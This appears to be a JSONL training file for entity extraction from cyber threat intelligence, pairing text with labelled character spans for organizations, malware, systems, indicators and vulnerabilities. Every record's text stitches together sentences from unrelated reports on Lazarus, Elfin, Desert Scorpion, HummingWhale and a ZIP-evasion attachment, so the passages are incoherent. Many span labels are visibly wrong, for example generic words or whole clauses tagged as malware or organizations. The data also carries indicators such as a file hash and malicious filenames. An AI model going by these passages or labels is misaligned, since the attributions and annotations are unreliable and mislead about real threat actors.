{"text": "Definition of populateConfigMap , which loads the map with values Correlating the last two steps , one can observe that the malware payload receives the configuration for the following properties : number \u2013 The default number to be send to the server ( in case the number is not available from the device ) api \u2013 The API key url \u2013 The URL to be used in WebView to display on the ransom note The malware saves this configuration to the shared preferences of the app data and then it sets up all the Broadcast Receivers . There are many articles and researches online about APT15 and their activities , the most recent one by NCC Group . WinZip version 11.2 and 24.0, and the built-in unzIP S-TOOL tool in Windows , recognized that the attachment SHIPPING_MX00034900_PL_INV_pdf.zip is an invalid . The threat actor first detected towards the end of last year when it attacked at least 87 organizations around the world in two months ' time .", "spans": [{"start": 572, "end": 577, "label": "Organization"}, {"start": 624, "end": 633, "label": "Organization"}, {"start": 636, "end": 642, "label": "System"}, {"start": 683, "end": 695, "label": "System"}, {"start": 704, "end": 711, "label": "System"}, {"start": 745, "end": 779, "label": "Indicator"}]}
{"text": "This action registers code components to get notified when certain system events happen . There are many articles and researches online about APT15 and their activities , the most recent one by NCC Group ; although posted in March 2018 , it refers to a campaign in 2017 , both attributed to Chinese government affiliated groups . Only WinZip gave an explicit reason \u2013 the start of central directory of the ZIP was not . For this reason , it is impossible to prevent all crime through deterrence .", "spans": [{"start": 142, "end": 147, "label": "Organization"}, {"start": 194, "end": 203, "label": "Organization"}, {"start": 335, "end": 341, "label": "System"}]}
{"text": "This is done in the function initComponents . DLL hijacking techniques have been seen in the past with the APT15 group . The central directory it pertained to is the one in the second ZIP . But then , following an upsurge in attacks in the second half of 2014 , GReAT characterized MiniDuke , CosmicDuke and the actor \u2019s Nemesis Gemina project - targeting government , diplomatic , energy , military and telecom operators - as \u2018 one of the world \u2019s most unusual APT operations \u2019 due to : \u2022 Its use of a customized backdoor written in Assembler using \u2018 old school \u2019 virus writing techniques and habits \u2022 Stealthy transfer of updates as executables hidden inside GIF files ( a form of steganography )", "spans": [{"start": 107, "end": 118, "label": "Organization"}, {"start": 262, "end": 267, "label": "Organization"}, {"start": 282, "end": 290, "label": "Malware"}, {"start": 293, "end": 303, "label": "Malware"}, {"start": 321, "end": 343, "label": "Organization"}, {"start": 346, "end": 366, "label": "Organization"}, {"start": 369, "end": 421, "label": "Organization"}]}
{"text": "Malware code showing initializing broadcast receiver Figure 15 . cyber actors of the North Korean to target the media , aerospace , financial , and critical infrastructure sectors in the United States and globally . At figure 2, the second EOCD indicates that its only central directory is located at file offset 0xd148f whereas it is at 0xd40d41. (The size of the first But while it was clear earlier on that attackers were actively exploiting CVE-2023 - 34362 , it was only a few days later that it became clear that Cl0p was behind the attacks .", "spans": [{"start": 65, "end": 77, "label": "Organization"}, {"start": 112, "end": 117, "label": "Organization"}, {"start": 120, "end": 129, "label": "Organization"}, {"start": 132, "end": 141, "label": "Organization"}, {"start": 148, "end": 179, "label": "Organization"}, {"start": 445, "end": 461, "label": "Vulnerability"}, {"start": 519, "end": 523, "label": "Organization"}]}
{"text": "Initializing the BroadcastReceiver against system events From this point on , the malware execution is driven by callback functions that are triggered on system events like connectivity change , unlocking the phone , elapsed time interval , and others . The U.S. Government refers to the malicious cyber activity by the North Korean government as HIDDEN COBRA . ZIP structure was not considered.) Meanwhile, the archiving tools PowerArchiver 2019 , WinRar , and 7Zip were able to extract a file from the attachment SHIPPING_MX00034900_PL_INV_pdf.zip . That is very concerning to us , however , there are a couple of things that end users can look out for : Although zero - click exploits do exist , they 're not very common .", "spans": [{"start": 258, "end": 273, "label": "Organization"}, {"start": 347, "end": 359, "label": "Organization"}, {"start": 428, "end": 446, "label": "System"}, {"start": 449, "end": 455, "label": "System"}, {"start": 462, "end": 466, "label": "System"}, {"start": 515, "end": 549, "label": "Indicator"}, {"start": 666, "end": 687, "label": "Vulnerability"}]}
{"text": "Lookout researchers have identified a new , highly targeted surveillanceware family known as Desert Scorpion in the Google Play Store . Tools and capabilities used by HIDDEN COBRA actors include DDoS botnets , keyloggers , remote access tools ( RATs ) , and wiper malware . The latest versions of PowerArchiver 2019 and WinRar displayed in their respective UI the executable SHIPPING_MX00034900_PL_INV_pdf.exe as the only content of the ZIP . However , lessons learned this year can help organizations take proactive steps to protect themselves from ransomware in 2023 .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 93, "end": 108, "label": "Malware"}, {"start": 116, "end": 133, "label": "System"}, {"start": 167, "end": 186, "label": "Organization"}, {"start": 195, "end": 207, "label": "System"}, {"start": 210, "end": 220, "label": "System"}, {"start": 223, "end": 242, "label": "System"}, {"start": 245, "end": 249, "label": "System"}, {"start": 258, "end": 271, "label": "System"}, {"start": 297, "end": 315, "label": "System"}, {"start": 320, "end": 326, "label": "System"}, {"start": 375, "end": 409, "label": "Indicator"}]}
{"text": "Lookout notified Google of the finding and Google removed the app immediately while also taking action on it in Google Play Protect . Variants of malware and tools used by HIDDEN COBRA actors include Destover and Hangman . No error or warning was prompted during the . Ideology is a motivation that makes the threat a little trickier .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 17, "end": 23, "label": "Organization"}, {"start": 43, "end": 49, "label": "Organization"}, {"start": 112, "end": 131, "label": "System"}, {"start": 172, "end": 191, "label": "Organization"}, {"start": 200, "end": 208, "label": "System"}, {"start": 213, "end": 220, "label": "System"}]}
{"text": "The app ties together two malware families - Desert Scorpion and another targeted surveillanceware family named FrozenCell - that we believe are being developed by a single , evolving surveillanceware actor called APT-C-23 targeting individuals in the Middle East . DHS has previously released Alert TA14-353A . Older versions of 7Zip also behave like PowerArchiver and WinRAR . 7Zip version 9.22 and older saw the executable as . Simultaneously , a threat researcher outside of CrowdStrike discovered an attacker \u2019s tooling via an open repository , downloaded all of the tools , and made them available through a MegaUpload link in a Twitter post.2", "spans": [{"start": 45, "end": 60, "label": "Malware"}, {"start": 112, "end": 122, "label": "Malware"}, {"start": 214, "end": 222, "label": "Malware"}, {"start": 266, "end": 269, "label": "Organization"}, {"start": 330, "end": 334, "label": "System"}, {"start": 352, "end": 365, "label": "System"}, {"start": 370, "end": 376, "label": "System"}, {"start": 379, "end": 383, "label": "System"}, {"start": 450, "end": 467, "label": "Organization"}, {"start": 479, "end": 490, "label": "Organization"}, {"start": 614, "end": 624, "label": "System"}, {"start": 635, "end": 642, "label": "System"}]}
{"text": "We 've seen this actor rely heavily on phishing campaigns to trick victims into downloading their malicious apps , specifically on Facebook . The DeltaCharlie DDoS bot was originally reported by Novetta in their 2016 Operation Blockbuster Malware Report . However, starting from 7Zip version 9.34 (next available installer after version 9.22) up to its latest version 19.0, 7zip saw and was able to extract the image file order.jpg . Second , as COSMICENERGY was potentially developed as part of a red team , this discovery suggests that the barriers to entry are lowering for offensive OT threat activity since we normally observe these types of capabilities limited to well resourced or state sponsored actors .", "spans": [{"start": 131, "end": 139, "label": "System"}, {"start": 195, "end": 202, "label": "Organization"}, {"start": 279, "end": 283, "label": "System"}, {"start": 374, "end": 378, "label": "System"}, {"start": 422, "end": 431, "label": "Indicator"}, {"start": 446, "end": 458, "label": "Malware"}]}
{"text": "Even sophisticated actors are using lower cost , less technologically impressive means like phishing to spread their malware because it 's cheap and very effective , especially on mobile devices where there are more ways to interact with a victim ( messaging apps , social media apps , etc . Our analysis shows that the cybercriminals behind the attack against an online casino in Central America , and several other targets in late-2017 , were most likely the infamous Lazarus hacking group . The second ZIP structure was treated as extra data; hence, a warning was added to the extracted image file\u2019s . /Library / LaunchDaemons / com.studentd.agent.plist", "spans": [{"start": 320, "end": 334, "label": "Organization"}, {"start": 470, "end": 491, "label": "Organization"}, {"start": 605, "end": 656, "label": "Indicator"}]}
{"text": ") , and less screen real estate for victims to identify potential indicators of a threat . The Lazarus Group was first identified in Novetta 's report Operation Blockbuster in February 2016 . Among the archiving tools we tried, WinRar 3.30 behaved differently and . It has two components Loader and core module .", "spans": [{"start": 95, "end": 108, "label": "Organization"}, {"start": 133, "end": 140, "label": "Organization"}, {"start": 228, "end": 234, "label": "System"}, {"start": 269, "end": 310, "label": "Malware"}]}
{"text": "Lookout customers are protected against this threat and additionally we have included a list of IOCs at the end of this report . cyberattacks against high-value targets in Ukraine in December 2015 and December 2016 . The content of the ZIP attachment it displayed in its UI was not the one it extracted! This sample challenges gateways . Surprisingly enough , it does not take very long to get some information about Hack520 : someone with this handle runs a blog and a Twitter account ( with a handle close to Hack520 ) that is also directly linked to the blog .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 417, "end": 424, "label": "Organization"}, {"start": 470, "end": 477, "label": "System"}, {"start": 511, "end": 518, "label": "Organization"}]}
{"text": "The potential actor and who they target Our current analysis strongly suggests Desert Scorpion is being deployed in targeted attacks against Middle Eastern individuals of interest specifically those in Palestine and has also been highlighted by other researchers . In all of these incidents , the Lazarus utilized similar toolsets , including KillDisk that was executed on compromised machines . Depending on the type of decompression engine used, there is a good probability that only the decoy file may be scrutinized and vetted, and the malicious content unnoticed \u2013 just like how some of the most popular archiving tools failed to notice the second ZIP . STRATOFEAR is a modular backdoor that communicates with C2 servers using a protocol specified in its C2 configuration , which is decrypted from a local file .", "spans": [{"start": 79, "end": 94, "label": "Malware"}, {"start": 297, "end": 304, "label": "Organization"}, {"start": 343, "end": 351, "label": "System"}, {"start": 659, "end": 669, "label": "Malware"}, {"start": 670, "end": 776, "label": "Malware"}, {"start": 788, "end": 815, "label": "Malware"}]}
{"text": "We have been able to tie the malware to a long-running Facebook profile that we observed promoting the first stage of this family , a malicious chat application called Dardesh via links to Google Play . We are confident this KillDisk malware was deployed by Lazarus , rather than by another , unrelated attacker . Despite what the gateway does, this attack would only succeed if the message got through the gateway and a particular archive utility is used by the end-user, such as certain versions of PowerArchiver , WinRar , and older 7Zip as described . The new exploit method bypasses URL rewrite mitigations for the endpoint provided by Microsoft in response to \u2022", "spans": [{"start": 55, "end": 63, "label": "Organization"}, {"start": 168, "end": 175, "label": "Malware"}, {"start": 189, "end": 200, "label": "System"}, {"start": 225, "end": 241, "label": "System"}, {"start": 258, "end": 265, "label": "Organization"}, {"start": 303, "end": 311, "label": "Organization"}, {"start": 501, "end": 514, "label": "System"}, {"start": 517, "end": 523, "label": "System"}, {"start": 536, "end": 540, "label": "System"}, {"start": 641, "end": 650, "label": "Organization"}]}
{"text": "The Lookout Threat Intelligence team identified that this same Facebook profile has also posted Google Drive links to Android malware belonging to the FrozenCell family attributed to APT-C-27 . This recent attack against an online casino in Central America suggests that hacking tools from the Lazarus toolset are recompiled with every attack ( we didn't see these exact samples anywhere else ) . In this case, the Trustwave Secure email Gateway flagged the message as suspicious and it did not get . Based on our research , we discovered an unknown threat actor using MortalKombat ransomware since December 2022 to target individuals and smaller companies .", "spans": [{"start": 4, "end": 31, "label": "Organization"}, {"start": 63, "end": 71, "label": "Organization"}, {"start": 96, "end": 108, "label": "System"}, {"start": 118, "end": 125, "label": "System"}, {"start": 151, "end": 161, "label": "Malware"}, {"start": 183, "end": 191, "label": "Indicator"}, {"start": 294, "end": 301, "label": "Organization"}, {"start": 432, "end": 437, "label": "System"}, {"start": 569, "end": 581, "label": "Organization"}, {"start": 623, "end": 656, "label": "Organization"}]}
{"text": "These factors , in combination with the fact that the command and control infrastructure used by Frozen Cell and Desert Scorpion resides in similar IP blocks , supports the theory that the same actor is responsible for operating , if not developing , both families . Utilizing KillDisk in the attack scenario most likely served one of two purposes : the attackers covering their tracks after an espionage operation , or it was used directly for extortion or cyber-sabotage . Nevertheless, this case does highlight the types of tricks the bad guys are using in an attempt to deliver malware through . It also reveals direct links to secure[.]66[.]to and zhu[.]vn , both of which also belong to Hack520 and contains his personal blog .", "spans": [{"start": 97, "end": 108, "label": "Malware"}, {"start": 113, "end": 128, "label": "Malware"}, {"start": 277, "end": 285, "label": "System"}, {"start": 354, "end": 363, "label": "Organization"}, {"start": 458, "end": 472, "label": "Organization"}, {"start": 632, "end": 648, "label": "Indicator"}, {"start": 653, "end": 661, "label": "Indicator"}, {"start": 693, "end": 700, "label": "Organization"}]}
{"text": "What it does The surveillance functionality of Desert Scorpion resides in a second stage payload that can only be downloaded if the victim has downloaded , installed , and interacted with the first-stage chat application . Today we'd like to share some of our findings , and add something new to what 's currently common knowledge about Lazarus Group activities , and their connection to the much talked about February 2016 incident , when an unknown attacker attempted to steal up to $851M USD from Bangladesh Central Bank . SHIPPING_MX00034900_PL_INV_pdf.zip : 9474e1517c98d4165300a49612888d16643efbf6 . CrowdStrike incident responders found that renamed Plink and AnyDesk executable creation timestamps on affected backend Exchange servers were closely correlated with PowerShell execution events in the Remote PowerShell logs , indicating the threat actor leveraged the newly discovered exploit chain to drop other tooling for persistent access to the affected Exchange servers .", "spans": [{"start": 47, "end": 62, "label": "Malware"}, {"start": 451, "end": 459, "label": "Organization"}, {"start": 500, "end": 523, "label": "Organization"}, {"start": 526, "end": 560, "label": "Indicator"}, {"start": 563, "end": 603, "label": "Indicator"}, {"start": 606, "end": 617, "label": "Organization"}]}
{"text": "The chat application acts as a dropper for this second-stage payload app . Since the Bangladesh incident there have been just a few articles explaining the connection between Lazarus Group and the Bangladesh bank heist . Elfin : Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S . KillNet \u2019s targeting has consistently aligned with established and emerging Russian geopolitical priorities , which suggests that at least part of the influence component of this hacktivist activity is intended to directly promote Russia 's interests within perceived adversary nations vis - a - vis the invasion of Ukraine .", "spans": [{"start": 175, "end": 188, "label": "Organization"}, {"start": 208, "end": 212, "label": "Organization"}, {"start": 221, "end": 226, "label": "Organization"}, {"start": 313, "end": 320, "label": "Organization"}, {"start": 492, "end": 511, "label": "Organization"}, {"start": 629, "end": 636, "label": "Organization"}]}
{"text": "At the time of writing Lookout has observed two updates to the Dardesh application , the first on February 26 and the second on March 28 . However , from this it 's only clear that Lazarus might have attacked Polish banks . The Elfin espionage group ( aka APT33 ) has remained highly active over the past three years , attacking at least 50 organizations in Saudi Arabia , the United States , and a range of other countries . None The discovery was part of recent CrowdStrike Services investigations into several Play ransomware intrusions where the common entry vector was confirmed to be Microsoft Exchange .", "spans": [{"start": 23, "end": 30, "label": "Organization"}, {"start": 63, "end": 70, "label": "Malware"}, {"start": 181, "end": 188, "label": "Organization"}, {"start": 216, "end": 221, "label": "Organization"}, {"start": 228, "end": 233, "label": "Organization"}, {"start": 256, "end": 261, "label": "Organization"}, {"start": 464, "end": 484, "label": "Organization"}, {"start": 513, "end": 539, "label": "Organization"}, {"start": 590, "end": 608, "label": "System"}]}
{"text": "The malicious capabilities observed in the second stage include the following : Upload attacker-specified files to C2 servers Get list of installed applications Get device metadata Inspect itself to get a list of launchable activities Retrieves PDF , txt , doc , xls , xlsx , ppt , pptx files found on external storage Send SMS Retrieve text messages Track device location Handle limited attacker commands via out of band text messages Record surrounding audio Record calls Record video Retrieve account information such as email addresses Retrieve contacts Removes copies of itself if Symantec also confirmed seeing the Lazarus wiper tool in Poland at one of their customers . The group , which first became active in late 2015 or early 2016 , specializes in scanning for vulnerable websites and using this to identify potential targets , either for attacks or creation of command and control ( C&C ) infrastructure . We judge that these operations are very likely aimed at stealing information and gaining persistent remote access .", "spans": [{"start": 586, "end": 594, "label": "Organization"}, {"start": 621, "end": 628, "label": "Organization"}, {"start": 666, "end": 675, "label": "Organization"}]}
{"text": "any additional APKs are downloaded to external storage . Considering that the afterhack publications by the media mentioned that the investigation stumbled upon three different attackers , it was not obvious whether Lazarus was the one responsible for the fraudulent SWIFT transactions , or if Lazarus had in fact developed its own malware to attack banks ' systems . It has compromised a wide range of targets , including governments along with organizations in the research , chemical , engineering , manufacturing , consulting , finance , telecoms , and several other sectors . NuisanceDestruction intrinsic There are some that are intrinsically motivated to simply attack an organization or person for no other reason than to create chaos and destruction .", "spans": [{"start": 108, "end": 113, "label": "Organization"}, {"start": 177, "end": 186, "label": "Organization"}, {"start": 216, "end": 223, "label": "Organization"}, {"start": 294, "end": 301, "label": "Organization"}, {"start": 350, "end": 355, "label": "Organization"}, {"start": 423, "end": 434, "label": "Organization"}]}
{"text": "Call an attacker-specified number Uninstall apps Check if a device is rooted Hide its icon Retrieve list of files on external storage If running on a Huawei device it will attempt to add itself to the protected list of apps able to run with the screen off Encrypts some exfiltrated data Desert Scorpion 's second stage masquerades as a generic \" settings '' application . We would like to add some strong facts that link some attacks on banks to Lazarus , and share some of our own findings as well as shed some light on the recent TTPs used by the attacker , including some yet unpublished details from the attack in Europe in 2017 . Elfin continues to be focused heavily on Saudi Arabia , which accounted for 42 percent of attacks observed by Symantec since the beginning of 2016 . Tortoiseshell Facebook Attack Campaign", "spans": [{"start": 287, "end": 302, "label": "Malware"}, {"start": 437, "end": 442, "label": "Organization"}, {"start": 446, "end": 453, "label": "Organization"}, {"start": 549, "end": 557, "label": "Organization"}, {"start": 635, "end": 640, "label": "Organization"}, {"start": 745, "end": 753, "label": "Organization"}, {"start": 784, "end": 822, "label": "Organization"}]}
{"text": "Curiously , several of these have included the world \" Fateh '' in their package name , which may be referring to the Fatah political party . Lazarus attacks are not a local problem and clearly the group 's operations span across the whole world . However , the U.S. has also been a country of significant interest to the group , with 18 organizations attacked over the past three years , including a number of Fortune 500 companies . Almost immediately after its channel \u2019s creation , the group began posting files from compromised Ukrainian organizations .", "spans": [{"start": 118, "end": 123, "label": "Organization"}, {"start": 198, "end": 203, "label": "Organization"}, {"start": 533, "end": 556, "label": "Organization"}]}
{"text": "Such references would be in line with FrozenCell 's phishing tactics in which they used file names to lure people associated with the political party to open malicious documents . Lazarus was previously known to conduct cyberespionage and cybersabotage activities , such as attacks on Sony Pictures Entertainment with volumes of internal data leaked , and many system harddrives in the company wiped . Elfin targets in the U.S. have included organizations in the engineering , chemical , research , energy consultancy , finance , IT , and healthcare sectors . Developed in - house using C++ , the NoEscape ransomware uses a hybrid approach to encryption , combining ChaCha20 and RSA encryption algorithms for file encryption and key protection .", "spans": [{"start": 38, "end": 48, "label": "Malware"}, {"start": 180, "end": 187, "label": "Organization"}, {"start": 285, "end": 312, "label": "Organization"}, {"start": 402, "end": 407, "label": "Organization"}, {"start": 587, "end": 590, "label": "System"}, {"start": 597, "end": 616, "label": "Malware"}]}
{"text": "Desert Scorpion 's second stage is capable of installing another non-malicious application ( included in the second stage ) which is highly specific to the Fatah political party and supports the targeting theory . We believe that Lazarus Group is very large and works mainly on infiltration and espionage operations , while a substantially smaller units within the group , which we have dubbed Bluenoroff , is responsible for financial profit . Some of these U.S. organizations may have been targeted by Elfin for the purpose of mounting supply chain attacks . In April 2023 , media reports suggested that the U.S. government determined that Zarya breached a Canadian oil pipeline .", "spans": [{"start": 0, "end": 15, "label": "Malware"}, {"start": 156, "end": 161, "label": "Organization"}, {"start": 230, "end": 243, "label": "Organization"}, {"start": 365, "end": 370, "label": "Organization"}, {"start": 394, "end": 404, "label": "Organization"}, {"start": 504, "end": 509, "label": "Organization"}]}
{"text": "The Lookout Threat Intelligence team is increasingly seeing the same tradecraft , tactics , and procedures that APT-C-23 favors being used by other actors . Lazarus regrouped and rushed into new countries , selecting mostly poorer and less developed locations , hitting smaller banks because they are , apparently , easy prey . In one instance , a large U.S. company was attacked in the same month a Middle Eastern company it co-owns was also compromised . The techniques leveraged during the incident suggest a growing maturity of Russia \u2019s offensive OT arsenal , including an ability to recognize novel OT threat vectors , develop new capabilities , and leverage different types of OT infrastructure to execute attacks .", "spans": [{"start": 4, "end": 31, "label": "Organization"}, {"start": 112, "end": 120, "label": "Malware"}, {"start": 157, "end": 164, "label": "Organization"}, {"start": 278, "end": 283, "label": "Organization"}, {"start": 532, "end": 562, "label": "Organization"}]}
{"text": "The approach of separating malicious functionality out into separate stages that are later downloaded during execution and not present in the initial app published to the Google Play Store , combined with social engineering delivered via social media platforms like Facebook , requires minimal investment in comparison to premium tooling like Pegasus or FinFisher . To date , the Lazarus group has been one of the most successful in launching large scale operations against the financial industry . In a recent wave of attacks during February 2019 , Elfin attempted to exploit a known vulnerability ( CVE-2018-20250 ) in WinRAR , the widely used file archiving and compression utility capable of creating self-extracting archive files . As we \u2019ve already previously discussed in our 2017 predictions , these groups will constantly evolve and employ unique and advanced attack techniques .", "spans": [{"start": 171, "end": 188, "label": "System"}, {"start": 266, "end": 274, "label": "Organization"}, {"start": 343, "end": 350, "label": "Malware"}, {"start": 354, "end": 363, "label": "Malware"}, {"start": 380, "end": 393, "label": "Organization"}, {"start": 478, "end": 496, "label": "Organization"}, {"start": 550, "end": 555, "label": "Organization"}, {"start": 601, "end": 615, "label": "Vulnerability"}, {"start": 621, "end": 627, "label": "System"}]}
{"text": "As we 've seen with actors like Dark Caracal , this low cost , low sophistication approach that relies heavily upon social engineering has still been shown to be highly successful for those operating such campaigns . We believe that Lazarus will remain one of the biggest threats to the banking sector , finance , and trading companies , as well as casinos for the next few years . The exploit was used against one target in the chemical sector in Saudi Arabia . csvde.exe", "spans": [{"start": 32, "end": 44, "label": "Malware"}, {"start": 233, "end": 240, "label": "Organization"}, {"start": 287, "end": 301, "label": "Organization"}, {"start": 304, "end": 311, "label": "Organization"}, {"start": 318, "end": 335, "label": "Organization"}, {"start": 349, "end": 356, "label": "Organization"}, {"start": 463, "end": 472, "label": "System"}]}
{"text": "Given previous operational security errors from this actor in the past which resulted in exfiltrated content being publicly accessible Lookout Threat Intelligence is continuing to map out infrastructure and closely monitor their continued evolution . We believe Lazarus started this watering hole attack at the end of 2016 after their other operation was interrupted in South East Asia . If successfully exploited on an unpatched computer , the vulnerability could permit an attacker to install any file on the computer , which effectively permits code execution on the targeted computer . This gave them the ability to launch an unprecedented number of attacks within a short time frame and across a massive scale .", "spans": [{"start": 135, "end": 162, "label": "Organization"}, {"start": 262, "end": 269, "label": "Organization"}]}
{"text": "Virulent Android malware returns , gets > 2 million downloads on Google Play HummingWhale is back with new tricks , including a way to gin user ratings . We believe they started this watering hole campaign at the end of 2016 after their other operation was interrupted in South East Asia . Two users in the targeted organization received a file called \" JobDetails.rar \" , which attempted to exploit the WinRAR vulnerability . UNC4899 targeting overlaps with a separate RGB - aligned group , APT43 , who in July , 2023 displayed interest in the cryptocurrency vertical , specifically targeting a variety of C - Suite executives from multiple fintech and cryptocurrency companies in the United States , South Korea , Hong Kong , and Singapore .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 9, "end": 16, "label": "System"}, {"start": 65, "end": 76, "label": "System"}, {"start": 77, "end": 89, "label": "Malware"}, {"start": 354, "end": 368, "label": "Indicator"}, {"start": 404, "end": 410, "label": "System"}, {"start": 427, "end": 434, "label": "Organization"}, {"start": 492, "end": 497, "label": "Organization"}, {"start": 607, "end": 678, "label": "Organization"}]}
{"text": "DAN GOODIN - 1/23/2017 , 4:39 PM A virulent family of malware that infected more than 10 million Android devices last year has made a comeback , this time hiding inside Google Play apps that have been downloaded by as many as 12 million unsuspecting users . A rudimentary but somewhat clever design , KiloAlfa provides keylogging capability for the Lazarus Group 's collection of malicious tools . This file was likely delivered via a spear-phishing email . We have previously observed targeting in countries including Germany , Denmark , Sweden , France , Poland , Slovakia , Ukraine , Israel , the United Arab Emirates ( UAE ) , and other NATO ally and partner countries such as Japan .", "spans": [{"start": 35, "end": 43, "label": "Malware"}, {"start": 97, "end": 104, "label": "System"}, {"start": 169, "end": 180, "label": "System"}, {"start": 301, "end": 309, "label": "System"}, {"start": 349, "end": 362, "label": "Organization"}]}
{"text": "HummingWhale , as the professionally developed malware has been dubbed , is a variant of HummingBad , the name given to a family of malicious apps researchers documented in July invading non-Google app markets . The design of KiloAlfa is broken down into two basic components : the persistence functionality and the keylogging functionality . However , prior to this attempted attack , Symantec had rolled out proactive protection against any attempt to exploit this vulnerability ( Exp.CVE-2018-20250 ) . Such non - native files and other data may be removed over the course of an intrusion to maintain a small footprint or as a standard part of the post - intrusion cleanup process .", "spans": [{"start": 0, "end": 12, "label": "Malware"}, {"start": 89, "end": 99, "label": "Malware"}, {"start": 226, "end": 234, "label": "System"}, {"start": 282, "end": 307, "label": "Malware"}, {"start": 316, "end": 340, "label": "System"}, {"start": 386, "end": 394, "label": "Organization"}, {"start": 483, "end": 501, "label": "Vulnerability"}]}
{"text": "HummingBad attempted to override security protections by exploiting unpatched vulnerabilities that gave the malware root privileges in older versions of Android . The persistence functionality of KiloAlfa allows the malware to self-install on a victim 's machine when activated ( described below ) . This protection successfully protected the targeted organization from being compromised . Prior to Citrix \u2019s publication and our development of a PoC , we believed the session takeovers were the result of zero - day exploitation of an unknown vulnerability .", "spans": [{"start": 0, "end": 10, "label": "Malware"}, {"start": 68, "end": 93, "label": "Vulnerability"}, {"start": 153, "end": 160, "label": "System"}, {"start": 167, "end": 192, "label": "Malware"}, {"start": 196, "end": 204, "label": "System"}, {"start": 505, "end": 528, "label": "Vulnerability"}]}
{"text": "Before Google shut it down , it installed more than 50,000 fraudulent apps each day , displayed 20 million malicious advertisements , and generated more than $ 300,000 per month in revenue . Evidence suggest that the Lazarus Group uses compromised infrastructure as the public-facing touchpoint for the majority of their malware samples . Elfin came under the spotlight in December 2018 when it was linked with a new wave of Shamoon attacks . This string is the schema that will be filled with the victim info , decoding this string will give us the following .", "spans": [{"start": 7, "end": 13, "label": "Organization"}, {"start": 217, "end": 230, "label": "Organization"}, {"start": 236, "end": 262, "label": "System"}, {"start": 339, "end": 344, "label": "Organization"}, {"start": 425, "end": 432, "label": "Organization"}, {"start": 448, "end": 509, "label": "Malware"}]}
{"text": "Of the 10 million people who downloaded HummingBad-contaminated apps , an estimated 286,000 of them were located in the US . PapaAlfa is believed to be one of the proxy malware components that the Lazarus Group uses to hide the true command and control server ( s ) for operations . One Shamoon victim in Saudi Arabia had recently also been attacked by Elfin and had been infected with the Stonedrill malware ( Trojan.Stonedrill ) used by Elfin . When CrowdStrike researchers later reproduced the attack , events were present in CozyDuke - also known as CozyBear , CozyCar and Office Monkeys ( among others ) , and whose activity appears to align with advanced persistent threat APT29 - is a threat actor which came to prominence in 2014 when it is believed to have staged a series of precise attacks on high profile targets including the US White House , Department of State and the Democratic National Committee .", "spans": [{"start": 40, "end": 63, "label": "Malware"}, {"start": 125, "end": 133, "label": "System"}, {"start": 197, "end": 210, "label": "Organization"}, {"start": 287, "end": 294, "label": "Organization"}, {"start": 353, "end": 358, "label": "Organization"}, {"start": 390, "end": 400, "label": "Malware"}, {"start": 411, "end": 428, "label": "Malware"}, {"start": 439, "end": 444, "label": "Organization"}, {"start": 452, "end": 475, "label": "Organization"}, {"start": 529, "end": 537, "label": "Malware"}, {"start": 554, "end": 562, "label": "Malware"}, {"start": 565, "end": 572, "label": "Malware"}, {"start": 577, "end": 591, "label": "Malware"}, {"start": 679, "end": 684, "label": "Organization"}, {"start": 692, "end": 704, "label": "Organization"}, {"start": 839, "end": 853, "label": "Organization"}, {"start": 856, "end": 875, "label": "Organization"}, {"start": 884, "end": 913, "label": "Organization"}]}
{"text": "HummingWhale , by contrast , managed to sneak its way into about 20 Google Play apps that were downloaded from 2 million to 12 million times , according to researchers from Check Point , the security company that has been closely following the malware family for almost a year . Rather , PapaAlfa could be considered a smart proxy due in part to the fact that the Lazarus can easily switch the backend destination address and port without having to reestablish control over the infected machine hosting the PapaAlfa malware . Because the Elfin and the Shamoon attacks against this organization occurred so close together , there has been speculation that the two groups may be linked . If you can not apply the KB5019758 patch immediately , you should disable OWA until the patch can be applied .", "spans": [{"start": 0, "end": 12, "label": "Malware"}, {"start": 68, "end": 79, "label": "System"}, {"start": 173, "end": 184, "label": "Organization"}, {"start": 288, "end": 296, "label": "System"}, {"start": 364, "end": 371, "label": "Organization"}, {"start": 507, "end": 523, "label": "System"}, {"start": 538, "end": 543, "label": "Organization"}, {"start": 552, "end": 559, "label": "Organization"}]}
{"text": "Rather than rooting devices , the latest variant includes new virtual machine techniques that allow the malware to perform ad fraud better than ever , company researchers said in a blog post published Monday . In terms of form factor , PapaAlfa comes in two flavors : service DLL and standalone executable . However , Symantec has found no further evidence to suggest Elfin was responsible for these Shamoon attacks to date . Mandiant identified novel operational technology ( OT ) / industrial control system ( ICS)-oriented malware , which we track as COSMICENERGY , uploaded to a public malware scanning utility in December 2021 by a submitter in Russia .", "spans": [{"start": 236, "end": 244, "label": "System"}, {"start": 268, "end": 279, "label": "System"}, {"start": 284, "end": 305, "label": "System"}, {"start": 318, "end": 326, "label": "Organization"}, {"start": 368, "end": 373, "label": "Organization"}, {"start": 400, "end": 407, "label": "Organization"}, {"start": 426, "end": 434, "label": "Organization"}, {"start": 446, "end": 533, "label": "Malware"}, {"start": 554, "end": 566, "label": "Malware"}, {"start": 583, "end": 614, "label": "System"}]}
{"text": "\" Users must realize that they can no longer trust in installing only apps with a high reputation from official app stores as their sole defense , '' the researchers wrote in an e-mail to Ars . The IndiaBravo-PapaAlfa installer is responsible for installing the service DLL variant . We continue to monitor the activities of both groups closely . Cisco Secure Endpoint ( formerly AMP for Endpoints ) is ideally suited to prevent the execution of the malware detailed in this post .", "spans": [{"start": 188, "end": 191, "label": "Organization"}, {"start": 198, "end": 227, "label": "System"}, {"start": 247, "end": 281, "label": "Malware"}, {"start": 347, "end": 368, "label": "System"}, {"start": 380, "end": 397, "label": "System"}]}
{"text": "\" This malware employs several tactics to keep its activity hidden , meaning users might be unaware of its existence on their device . While the tools profiled in this report are not inherently malicious , their capabilities are nonetheless integral to the Lazarus Group 's cyber operations , both espionage and destructive in nature , making them inherently dangerous to potential victims . Elfin has deployed a wide range of tools in its attacks including custom malware , commodity malware , and open-source hacking tools . A careful analysis of the domain registrations from this threat actor between 2014 and 2015 allowed us to identify one profile used to register several domains that were used as C&C servers for a particular malware family employed by the Winnti group .", "spans": [{"start": 257, "end": 270, "label": "Organization"}, {"start": 298, "end": 307, "label": "Organization"}, {"start": 392, "end": 397, "label": "Organization"}, {"start": 527, "end": 777, "label": "Malware"}]}
